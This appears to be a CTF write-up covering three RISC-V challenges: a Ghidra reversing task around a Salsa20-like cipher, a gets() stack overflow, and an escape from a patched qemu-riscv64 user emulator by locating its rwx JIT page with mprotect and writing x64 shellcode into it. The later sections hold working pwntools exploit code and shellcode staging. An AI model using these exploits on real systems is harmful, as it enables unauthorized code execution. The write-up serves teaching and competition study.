Last weekend the sixstar team brought a series of RISC-V challenges to their CTF. As the challenge name suggests, I enjoy playing RISC-V challenges very much. Three flags could be found at the checkpoints:
- Favourite Architecture 0: Reverse challenge, 25 solved
- Favourite Architecture 1: Userspace pwn challenge, read /home/pwn/flag. 24 solved
- Favourite Architecture 2: Qemu userspace escape pwn challenge, execute /readflag2. 6 solved
Recon
The challenge designer provided a zip file that can be used to build the Docker image.

    Archive: c11db24e682f4d4d802f4a3ca9ca76b8.zip
Generally, there are three important files:
main: riscv64 elf file
    ./main: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, for GNU/Linux 4.15.0, BuildID[sha1]=c54b93fd63fcb530ed539bd25e4322a08324b0b7, stripped

The riscv64 file was compiled without any mitigations.
qemu-riscv64: patched qemu userspace emulator
The qemu-riscv64 binary is version 5.2 of the qemu userspace emulator with the following patch applied, which adds a whitelist that allows only a subset of syscalls.

    diff --git a/linux-user/syscall.c b/linux-user/syscall.c
entry: launcher script
entry is a bash script that launches the challenge.
Favourite Architecture 0
Unfortunately, my favorite reverse engineering tool, IDA Pro, still does not support this “favorite architecture”, but we can turn to the powerful Ghidra, which has had nice support since version 9.2, released in November 2020 (see the Ghidra release notes).
I was too lazy to update to the new version, so this challenge was solved with a development build from August 2020. The old version is enough, and I guess the new release should have even better support for RISC-V.
With the string "Input the flag:" we can quickly locate the main function at 0x10400, but the decompile window shows “Unknown Error”. Here is a little trick to work around this issue:
1. Locate the function in which the gp value is set. In this case it is 0x101ec, and this function can be decompiled automatically:

    void FUN_000101ec(void)
    {
      gp = (undefined *)0x6f178;
      return;
    }

   We can see that gp is set to 0x6f178, and this value stays the same for the whole run.
2. Press Ctrl-A in the disassembly window to select all the code, then press Ctrl-R to open the set register window. In this window, we can set the correct gp value.
3. Go back to the main function at 0x10400, and now it can be decompiled correctly.
The decompile result was pretty readable. With some guessing, we can identify the library functions and understand the logic.

    undefined8 UndefinedFunction_00010400(void)

After getting the input, it first checks whether the length is 0x59, and then performs the verification in two steps:
- The input string is processed with some kind of encryption by 0x1118a and 0x111ea, and the result is compared with a hex string at 0x6e9d8.
- The last 0x30 bytes of the input string are split into 6 qwords and passed to 0x102ae with a key at 0x6d060, then the result is compared with the hex string at 0x6d030.
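The two steps above can be sketched as a split of the input buffer. This is only an illustration: the function name `split_input` is made up, the qwords are assumed to be little-endian (the ELF is LSB), and I am assuming the first step effectively covers the leading 0x29 bytes, since 0x59 - 0x30 = 0x29.

```python
import struct

FLAG_LEN = 0x59   # total length checked by main
TAIL_LEN = 0x30   # bytes handled by the block function at 0x102ae


def split_input(data: bytes):
    """Split the input the way the two verification steps appear to consume it."""
    if len(data) != FLAG_LEN:
        raise ValueError("length check would fail")
    head = data[:FLAG_LEN - TAIL_LEN]                 # 0x29 bytes, stream cipher step
    qwords = struct.unpack("<6Q", data[-TAIL_LEN:])   # six little-endian 64-bit groups
    return head, qwords


head, qwords = split_input(b"A" * 0x29 + b"B" * 0x30)
print(len(head), [hex(q) for q in qwords])
```

Each of the six values would then go through 0x102ae separately.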
For the first part, we can track down 0x1118a and find a clue in 0x106ce:

    void FUN_000106ce(longlong param_1,longlong param_2,longlong param_3)
    {
      undefined4 uVar1;

      FUN_00021386(param_1 + 0x48,param_2,0x20);
      FUN_00021386(param_1 + 0x68,param_3,0xc);
      uVar1 = FUN_000105ce("expand 32-byte k");
      *(undefined4 *)(param_1 + 0x80) = uVar1;
      uVar1 = FUN_000105ce("nd 32-byte k");
      *(undefined4 *)(param_1 + 0x84) = uVar1;
      uVar1 = FUN_000105ce("2-byte k");
      *(undefined4 *)(param_1 + 0x88) = uVar1;
      uVar1 = FUN_000105ce("te k");
      *(undefined4 *)(param_1 + 0x8c) = uVar1;
      uVar1 = FUN_000105ce(param_2);
      *(undefined4 *)(param_1 + 0x90) = uVar1;
      uVar1 = FUN_000105ce(param_2 + 4);
      *(undefined4 *)(param_1 + 0x94) = uVar1;
      uVar1 = FUN_000105ce(param_2 + 8);
      *(undefined4 *)(param_1 + 0x98) = uVar1;
      uVar1 = FUN_000105ce(param_2 + 0xc);
      *(undefined4 *)(param_1 + 0x9c) = uVar1;
      uVar1 = FUN_000105ce(param_2 + 0x10);
      *(undefined4 *)(param_1 + 0xa0) = uVar1;
      uVar1 = FUN_000105ce(param_2 + 0x14);
      *(undefined4 *)(param_1 + 0xa4) = uVar1;
      uVar1 = FUN_000105ce(param_2 + 0x18);
      *(undefined4 *)(param_1 + 0xa8) = uVar1;
      uVar1 = FUN_000105ce(param_2 + 0x1c);
      *(undefined4 *)(param_1 + 0xac) = uVar1;
      *(undefined4 *)(param_1 + 0xb0) = 0;
      uVar1 = FUN_000105ce(param_3);
      *(undefined4 *)(param_1 + 0xb4) = uVar1;
      uVar1 = FUN_000105ce(param_3 + 4);
      *(undefined4 *)(param_1 + 0xb8) = uVar1;
      uVar1 = FUN_000105ce(param_3 + 8);
      *(undefined4 *)(param_1 + 0xbc) = uVar1;
      FUN_00021386(param_1 + 0x68,param_3,0xc);
      gp = (undefined *)0x6f178;
      return;
    }
It looks like a key initialization function. Searching for the constant “expand 32-byte k” shows that it comes from Salsa20.
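To make the layout easier to see, here is a minimal Python sketch of the 16-word state that the decompiled function writes at param_1 + 0x80 through param_1 + 0xbc. It assumes that FUN_000105ce simply loads one little-endian 32-bit word; the names `load32` and `init_state` are mine. As a side note, the contiguous order (4 constant words, 8 key words, a zero counter, 3 nonce words from a 12-byte nonce) is also how the ChaCha20 relative of Salsa20 arranges its state, and ChaCha20 shares the same constant string. That is my reading of the layout, not something the binary states.

```python
import struct


def load32(buf: bytes, off: int = 0) -> int:
    """Assumed behaviour of FUN_000105ce: read one little-endian 32-bit word."""
    return struct.unpack_from("<I", buf, off)[0]


def init_state(key: bytes, nonce: bytes) -> list:
    """Rebuild the 16 words stored at param_1 + 0x80 .. param_1 + 0xbc."""
    if len(key) != 0x20 or len(nonce) != 0xC:
        raise ValueError("expected a 32-byte key and a 12-byte nonce")
    sigma = b"expand 32-byte k"
    state = [load32(sigma, i) for i in range(0, 16, 4)]    # 0x80..0x8c: constants
    state += [load32(key, i) for i in range(0, 32, 4)]     # 0x90..0xac: key words
    state.append(0)                                        # 0xb0: counter set to 0
    state += [load32(nonce, i) for i in range(0, 12, 4)]   # 0xb4..0xbc: nonce words
    return state


# Dummy key and nonce, only to show the resulting word layout.
state = init_state(bytes(range(32)), bytes(12))
print([hex(w) for w in state])
```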
The encryption logic is quite similar, but some magic numbers do not seem to match the generic algorithm. The key point, however, is that Salsa20 is a symmetric stream cipher, so we can use the same logic to decrypt the ciphertext. So I simply sent the hex string at 0x6d000, which is 0x29 bytes long, padded with 0x30 \x00 bytes. Then I set a breakpoint at the call to strcmp to see the plaintext in memory. It was flag{have_you_tried_ghidra9.2_decompiler_
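The reason this trick works is that a stream cipher only XORs the data with a keystream, so running the "encryption" over the ciphertext gives back the plaintext. A small sketch of that property follows. The keystream here is a stand-in built from SHA-256 and the key is hypothetical; it is not the cipher from the binary.

```python
import hashlib


def keystream(key: bytes, n: int) -> bytes:
    """Toy keystream (SHA-256 in counter mode), standing in for the real cipher."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(8, "little")).digest()
        counter += 1
    return out[:n]


def xor_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt and decrypt are the same operation: XOR with the keystream."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


key = b"hypothetical key"
plain = b"flag{have_you_tried_ghidra9.2_decompiler_"
cipher = xor_crypt(key, plain)

# Feed the ciphertext (padded with 0x30 zero bytes) back through the same routine.
recovered = xor_crypt(key, cipher + b"\x00" * 0x30)
print(recovered[:len(plain)])
```

The padding does not disturb the first 0x29 bytes, because each output byte depends only on the keystream byte at the same position.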
For the second part, it turned out that 0x102ae is a naive encryption function with 10 rounds:

    void FUN_000102ae(uint *param_1,int *param_2)

My first idea was to brute-force the key, because the first part of the flag suggested that it consisted only of lowercase letters. I even wrote a simple Python script for this task, but it was too slow. Later, I realized that it was possible to reverse this function and write a decrypt function. So I wrote a simple C program to get the rest of the flag.
It printed _if_you_have_hexriscv_plz_share_it_with_me_thx:P}, so the final flag for this checkpoint is flag{have_you_tried_ghidra9.2_decompiler_if_you_have_hexriscv_plz_share_it_with_me_thx:P}
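As a sketch of why a round-based function like 0x102ae can be reversed instead of brute-forced: when each round only adds a value derived from the other half of the block, the rounds can be undone one by one in reverse order by subtracting. The round function `mix`, the key, and the test block below are made up for illustration. They are not the logic or data from the binary.

```python
MASK = 0xFFFFFFFF
ROUNDS = 10


def mix(x: int, k: int) -> int:
    """Hypothetical round function; any function of (x, k) works here."""
    return ((((x << 4) ^ (x >> 5)) + x) ^ k) & MASK


def encrypt(block, key):
    v0, v1 = block
    for r in range(ROUNDS):
        v0 = (v0 + mix(v1, key[r % 4] + r)) & MASK
        v1 = (v1 + mix(v0, key[(r + 1) % 4] + r)) & MASK
    return v0, v1


def decrypt(block, key):
    v0, v1 = block
    for r in reversed(range(ROUNDS)):          # undo the rounds last to first
        v1 = (v1 - mix(v0, key[(r + 1) % 4] + r)) & MASK
        v0 = (v0 - mix(v1, key[r % 4] + r)) & MASK
    return v0, v1


key = (0x11111111, 0x22222222, 0x33333333, 0x44444444)   # made-up key
block = (0x67616C66, 0x7B7B7B7B)                          # made-up plaintext block
print(decrypt(encrypt(block, key), key) == block)
```

Note that `mix` itself never has to be inverted, which is what makes this kind of construction cheap to decrypt once the key is known.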
Favourite Architecture 1
Before I analyzed the vulnerability, I noticed that at one point more teams had solved Favourite Architecture 1 than 0, so the vulnerability must be independent of the flag verification in the reversing challenge. An experienced pwner will quickly spot that the input is read with the gets function.
Because the binary itself does not have any mitigations, there are many ways to achieve RCE, including the old-school nop-sled technique. However, we want a stable trigger on the remote machine, so I spent some time finding a gadget that reaches the shellcode unconditionally. I chose to jump to 0x10442, because we control s0 and can therefore set the argument of gets to an address in .bss. When the main function finishes, we pivot to .bss and execute the shellcode received by the second gets.
    010442 93 07 84 ed addi a5,s0,-0x128
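Since the gadget computes the gets argument as s0 - 0x128, the saved s0 has to be the target address plus 0x128. The sketch below rebuilds the first-stage payload with plain struct, using the offsets and addresses from my exploit script (280 and 504 bytes of padding, 0x6f000 as the .bss target). The helper names are mine, and the role of the trailing pointer (the return address that is picked up when the epilogue of main runs a second time) is how I understand the layout.

```python
import struct

BSS = 0x6F000          # writable address that will hold the shellcode
CALL_GETS = 0x10442    # addi a5,s0,-0x128, leading into the call to gets


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value."""
    return struct.pack("<Q", value)


def build_stage1() -> bytes:
    fake_s0 = BSS + 0x128                    # so that s0 - 0x128 == BSS
    payload = b"A" * 280 + p64(fake_s0)      # padding up to the saved s0
    payload += p64(CALL_GETS)                # saved ra: run gets(BSS)
    payload += b"B" * 504 + p64(BSS)         # second return: jump to the shellcode
    if b"\n" in payload:                     # gets stops reading at a newline
        raise ValueError("payload contains a newline")
    return payload


stage1 = build_stage1()
print(len(stage1), hex(BSS + 0x128))
```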
The exploit is not complicated:
    from pwn import *

sc.bin contains the raw shellcode and can be generated from the following assembly code, which is modified from my previous writeup: https://matshao.com/2020/05/18/DEFCON-2020-Quals-nooopsled/

    # riscv64-linux-gnu-as sc.asm -o sc
Favourite Architecture 2
This checkpoint is the highlight of the challenges. We are required to execute readflag2 to get the flag. We already have RCE inside RISC-V from the last checkpoint, but readflag2 is an x64 ELF, so we need code execution in the qemu-riscv64 process itself to run it.
The hint for this task is the syscall whitelist from the patch file: we are supposed to get RCE in the qemu userspace emulator with these syscalls.

    + case TARGET_NR_brk:
I guess the purpose of this challenge is not to find a 0day in the qemu user emulator implementation, but more likely to get RCE through some logic bug. When we attach gdb to the qemu-riscv64 process and print the memory maps, we can see a region with rwx permissions (0x7fffe8000000-0x7fffeffff000). It is used by the JIT code generator. And if we attach gdb to the gdb stub of the qemu user emulator, the vmmap command shows all memory as rwx. Although this result is not very convincing, it made me think that maybe we could access the JIT code page from RISC-V userspace. If that works, we can write x64 shellcode to the JIT code page and make the emulator execute it.

    vmmap of qemu-riscv64

    vmmap when connect to gdb stub provide by qemu-riscv64
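The same check can be done without gdb by reading the maps of the emulator process from the host. Below is a small sketch of a parser that picks out rwx regions from text in /proc/&lt;pid&gt;/maps format. The first sample line is invented for illustration; the second uses the rwx range mentioned above.

```python
def find_rwx(maps_text: str):
    """Return (start, end) for every mapping whose permissions start with rwx."""
    regions = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        if fields[1].startswith("rwx"):
            start, end = (int(part, 16) for part in fields[0].split("-"))
            regions.append((start, end))
    return regions


# Sample input: the first line is made up, the second is the JIT region.
sample = """\
555555554000-555555a00000 r-xp 00000000 08:01 1234 /pwn/qemu-riscv64
7fffe8000000-7fffeffff000 rwxp 00000000 00:00 0
"""

for start, end in find_rwx(sample):
    print(hex(start), hex(end), hex(end - start))
```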
But we need to know the address of the JIT code page. My first idea was to check /proc/self/maps from the RISC-V program. I wrote a simple program, compiled it as a static RISC-V ELF, and executed it with qemu-riscv64. It seems that the emulator has special logic to deal with these proc files, so we could not read any emulator addresses from it.

    10000-6a000 r--p 00000000 00:35 144454 /pwn/test
I also tried searching for a JIT page pointer from 0x1000 to 0x4000801000, but it did not work. I noticed that there are some memory-related syscalls in the whitelist, so maybe we can use them to search for the JIT page address? It sounds worth trying!
I wrote a simple function to brute-force the JIT code page address with mprotect. By running the emulator several times, we found that the address is always a multiple of 0x000004000000. The reason we probe va+0x4000 instead of va is that the JIT code is placed from the start of the JIT code page, and we need to avoid touching the JIT code that is currently running. Otherwise, the emulator will crash.
We compiled the program as a static RISC-V ELF, and it successfully gave us the address of the JIT code page.

    size_t test_map() {
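The search logic itself is just a loop over aligned candidates. Here is a minimal Python model of it, with the actual probe abstracted into a callback. In the real program the probe is mprotect(va + 0x4000, 0x1000, 7) issued from the RISC-V side and checked for success; here `fake_probe` simulates that against the rwx range seen in gdb. The function names and the search bounds are hypothetical.

```python
STEP = 0x4000000        # observed alignment of the JIT region
PROBE_OFFSET = 0x4000   # probe a little past the start, away from the running code


def find_jit_page(probe, start, end, step=STEP, offset=PROBE_OFFSET):
    """Return the first aligned va in [start, end) for which probe(va + offset) succeeds."""
    va = start - (start % step)
    if va < start:
        va += step
    while va < end:
        if probe(va + offset):
            return va
        va += step
    return None


def fake_probe(addr: int) -> bool:
    """Stand-in for the mprotect call: succeeds only inside the simulated JIT region."""
    return 0x7FFFE8000000 <= addr < 0x7FFFEFFFF000


found = find_jit_page(fake_probe, 0x7FFF00000000, 0x800000000000)
print(hex(found))
```

Stepping by the observed alignment keeps the number of syscalls small, which matters because every probe goes through the emulator.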
Then we added the x64 shellcode injection logic to test whether we can hijack the control flow by writing to the JIT code page. We tried to inject x64 shellcode that prints “here”, and it did work.
    root@matthew-Virtual-Machine:/pwn# ./qemu-riscv64 ./test

From this experiment, we know that we can search for the JIT code page address with mprotect, write x64 shellcode to the page, and get RCE in the emulator. The next step is to construct RISC-V shellcode for the job.

    # riscv64-linux-gnu-as sc1.asm -o sc
The assembly code works as follows:
- Search for the JIT code page with mprotect(va+0xf000, 0x1000, 7). The offset was changed from 0x4000 to 0xf000, because we found that 0x4000 does not work on the remote machine.
- Receive the x64 shellcode with read(0, 0x7000, 0x200).
- Copy the x64 shellcode from 0x7000 to va, from higher addresses to lower addresses, to avoid accidentally ruining the running JIT code.
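The copy direction in the last step can be modelled on a bytearray. In this sketch the JIT page is a buffer filled with 0xcc, and the staged bytes are written from the highest offset down, so the byte at the very start of the region is replaced last. My understanding is that this keeps the entry of the region intact until the rest of the shellcode is already in place. The function name and buffer contents are illustrative only.

```python
def copy_backwards(dst: bytearray, dst_off: int, src: bytes) -> list:
    """Copy src into dst from the last byte to the first; return the write order."""
    order = []
    for i in range(len(src) - 1, -1, -1):
        dst[dst_off + i] = src[i]
        order.append(dst_off + i)
    return order


jit_page = bytearray(b"\xcc" * 0x400)     # stand-in for the JIT code page at va
staged = b"\x90" * 0x100 + b"\xeb\xfe"    # NOP sled plus a 2-byte placeholder stub

order = copy_backwards(jit_page, 0, staged)
print(order[0], order[-1], jit_page[:4].hex())
```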
And the Python exploit looks like this:

    from pwn import *
    import re

    # Written for Python 2 pwntools: payloads are plain str objects.
    context.terminal = ['tmux', 'splitw', '-h']
    context.arch = 'amd64'
    context.log_level = "debug"
    env = {'LD_PRELOAD': ''}

    if len(sys.argv) == 1:
        p = process('./cmd')
        is_remote = False
    elif len(sys.argv) == 3:
        p = remote(sys.argv[1], sys.argv[2])
        is_remote = True

    se = lambda data :p.send(data)
    sa = lambda delim,data :p.sendafter(delim, data)
    sl = lambda data :p.sendline(data)
    sla = lambda delim,data :p.sendlineafter(delim, data)
    sea = lambda delim,data :p.sendafter(delim, data)
    rc = lambda numb=4096 :p.recv(numb)
    ru = lambda delims, drop=True :p.recvuntil(delims, drop)
    uu32 = lambda data :u32(data.ljust(4, '\0'))
    uu64 = lambda data :u64(data.ljust(8, '\0'))
    info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

    # Local run: attach gdb to the emulator in a new tmux pane.
    if not is_remote:
        time.sleep(0.5)
        # subprocess.call(['tmux', 'split-window', '-h', 'gdb-multiarch', '-x', '1.gdb'])
        pid = subprocess.check_output(['pidof', 'qemu-riscv64'])
        pid = pid.strip()
        subprocess.call(['tmux', 'split-window', '-h', 'gdb', 'attach', pid])

    def update_sc():
        # Rebuild sc.bin from the RISC-V assembly source.
        subprocess.call(["./build_sc.sh"])

    update_sc()
    sc = open("sc.bin", "rb").read()
    assert "\n" not in sc  # gets() stops at a newline

    gets = 0x16a5a
    call_gets = 0x10442

    # Stage 1: set s0 so that gets() writes to 0x6f000, then return there.
    data = cyclic(280) + p64(0x6f000 + 0x128)
    data += p64(call_gets)
    data += cyclic(504) + p64(0x6f000)
    # data += p64()
    time.sleep(0.5)
    sla("flag:", data)

    # Stage 2: RISC-V shellcode that locates the JIT page and copies the x64 stage.
    sl(sc)
    time.sleep(0.5)

    # Stage 3: x64 shellcode executed by the emulator itself.
    x86_shellcode = asm(shellcraft.linux.execve("/readflag2") + shellcraft.linux.exit())
    # x86_shellcode = asm(shellcraft.amd64.infloop())
    payload = "\x90"*0x100 + x86_shellcode
    payload = payload.ljust(0x200, "\x00")  # ljust returns a new string, so keep the result
    se(payload)
    p.interactive()
    #flag{qemu_user_s4ndb0x_is_dangerous}
This will give us the last flag.
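For reference, the layout of the final x64 stage can be sketched without pwntools. The RISC-V stage reads exactly 0x200 bytes, so the payload is a 0x100-byte NOP sled, then the shellcode, then zero padding up to 0x200. The stub below is a 2-byte infinite loop used only as a placeholder for the real execve shellcode, and the helper name is mine.

```python
NOP = b"\x90"
STAGE_SIZE = 0x200   # size passed to read(0, 0x7000, 0x200)


def build_x64_payload(shellcode: bytes, sled: int = 0x100, size: int = STAGE_SIZE) -> bytes:
    """NOP sled + shellcode, zero-padded to the exact size the RISC-V stage reads."""
    payload = NOP * sled + shellcode
    if len(payload) > size:
        raise ValueError("shellcode does not fit in the staging buffer")
    # bytes.ljust returns a new object, so the padded value must be returned or assigned.
    return payload.ljust(size, b"\x00")


stub = b"\xeb\xfe"   # placeholder: jmp to itself
payload = build_x64_payload(stub)
print(len(payload), payload[0x100:0x102].hex())
```

Padding to the full read size means a single send satisfies the read call, so the RISC-V stage does not block waiting for more input.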